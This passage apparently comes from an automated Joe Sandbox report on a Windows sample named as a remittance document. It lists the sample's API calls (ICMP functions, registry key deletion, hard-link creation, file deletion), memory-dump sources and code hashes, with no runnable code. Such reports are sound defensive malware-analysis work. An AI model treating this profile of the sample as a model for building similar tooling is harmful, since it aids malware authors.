                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$_wcscpy
                                                                      • String ID: 3, 3, 8, 1
                                                                      • API String ID: 3469035223-357260408
                                                                      • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                      • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                                      • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                      • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                                      • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: ICMP.DLL$IcmpCloseHandle
                                                                      • API String ID: 2574300362-3530519716
                                                                      • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                      • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                                      • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                      • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                                      • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: ICMP.DLL$IcmpCreateFile
                                                                      • API String ID: 2574300362-275556492
                                                                      • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                      • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                                      • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                      • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                                      • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: ICMP.DLL$IcmpSendEcho
                                                                      • API String ID: 2574300362-58917771
                                                                      • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                      • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                                      • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                      • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                      • API String ID: 2574300362-4033151799
                                                                      • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                      • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                      • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                      • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430DD3
                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00430DE5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                      • API String ID: 2574300362-1816364905
                                                                      • Opcode ID: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                                                      • Instruction ID: 24515a708fc6b3a38513646dac5635f6d90a943ae1c03eade4216686bbe3791e
                                                                      • Opcode Fuzzy Hash: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                                                      • Instruction Fuzzy Hash: 51E0127154070A9BD7105FA5E91878A77D8DB14751F10882AFD45E2650D7B8E480C7BC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                      • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                                                      • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                      • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                      • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                      • VariantClear.OLEAUT32(?), ref: 00479650
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$AllocClearCopyInitString
                                                                      • String ID:
                                                                      • API String ID: 2808897238-0
                                                                      • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                      • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                      • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                      • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                                      • __itow.LIBCMT ref: 004699CD
                                                                        • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                                      • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                                      • __itow.LIBCMT ref: 00469A97
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$__itow
                                                                      • String ID:
                                                                      • API String ID: 3379773720-0
                                                                      • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                      • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                                      • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                      • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                                      APIs
                                                                      • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                      • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ClientMoveRectScreen
                                                                      • String ID:
                                                                      • API String ID: 3880355969-0
                                                                      • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                      • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                                      • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                      • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                      • String ID:
                                                                      • API String ID: 2782032738-0
                                                                      • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                      • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                                      • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                      • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                                      APIs
                                                                      • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                      • GetWindowRect.USER32(?,?), ref: 00441722
                                                                      • PtInRect.USER32(?,?,?), ref: 00441734
                                                                      • MessageBeep.USER32(00000000), ref: 004417AD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                      • String ID:
                                                                      • API String ID: 1352109105-0
                                                                      • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                      • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                                      • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                      • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                                      APIs
                                                                      • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                      • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                      • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                      • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 3321077145-0
                                                                      • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                      • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                                      • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                      • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                                      APIs
                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                                      • __isleadbyte_l.LIBCMT ref: 004208A6
                                                                      • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                                      • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                      • String ID:
                                                                      • API String ID: 3058430110-0
                                                                      • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                      • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                                      • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                      • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                                      APIs
                                                                      • GetParent.USER32(?), ref: 004503C8
                                                                      • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                      • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                      • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Proc$Parent
                                                                      • String ID:
                                                                      • API String ID: 2351499541-0
                                                                      • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                      • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                                      • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                      • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                                      APIs
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                                      • TranslateMessage.USER32(?), ref: 00442B01
                                                                      • DispatchMessageW.USER32(?), ref: 00442B0B
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Peek$DispatchTranslate
                                                                      • String ID:
